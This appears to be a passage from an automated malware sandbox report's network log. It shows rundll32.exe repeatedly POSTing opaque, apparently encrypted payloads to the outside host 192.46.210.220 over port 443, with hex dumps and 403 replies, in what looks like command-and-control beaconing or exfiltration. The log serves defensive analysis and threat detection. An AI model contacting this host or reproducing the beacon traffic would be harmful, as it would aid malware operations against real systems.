                                                                                                      2021-10-28 03:07:45 UTC109OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:46 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.449874192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:46 UTC114OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:46 UTC114OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:46 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.449883192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:49 UTC119OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:49 UTC119OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:50 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.449884192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:49 UTC124OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:49 UTC124OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:50 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.449892192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:53 UTC129OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:53 UTC129OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:54 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.449893192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:53 UTC134OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:53 UTC134OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:54 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.449900192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:57 UTC139OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:57 UTC139OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:58 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.449901192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:57 UTC144OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:57 UTC144OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:58 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.449794192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:06 UTC14OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:06 UTC14OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:07 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:07 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.449913192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:01 UTC149OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:01 UTC149OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:01 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.449914192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:01 UTC154OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:01 UTC154OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:02 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.449921192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:05 UTC159OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:05 UTC159OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:05 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.449922192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:05 UTC164OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:05 UTC164OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:05 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.449929192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:08 UTC169OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
